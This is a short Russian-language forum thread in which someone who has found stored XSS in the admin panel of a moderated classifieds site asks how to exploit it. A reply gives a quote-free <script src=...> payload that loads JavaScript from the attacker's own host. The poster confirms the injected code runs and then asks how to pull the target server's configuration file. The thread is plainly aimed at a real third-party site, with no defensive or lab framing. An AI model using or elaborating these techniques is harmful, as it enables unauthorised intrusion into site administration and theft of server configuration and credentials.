Нашел Xss в админке(доска объявлений с премодерированием). Не проходят только символы " ' \ Авторизация через сессии. Что можно сделать с помощью яваскрипта? Спс.
Да. <script src=абсолютный_адрес_без_кавычек></script> Скрипт должен находиться где-то на твоем хосте
Спасибо, будем пробовать <script src=http://xxx.com/rrr.php></script> - вот так нет реакции, там можно PHP подключать или только яваскрипт? --------------- упс, код выполняется, идем дальше.
Такой вопрос: Как заставить код выполняться на их сервере а не на моем? Нужно выкачать конфигурационный файл, но скрипт выполняется у меня и ищет файл у меня на хосте.
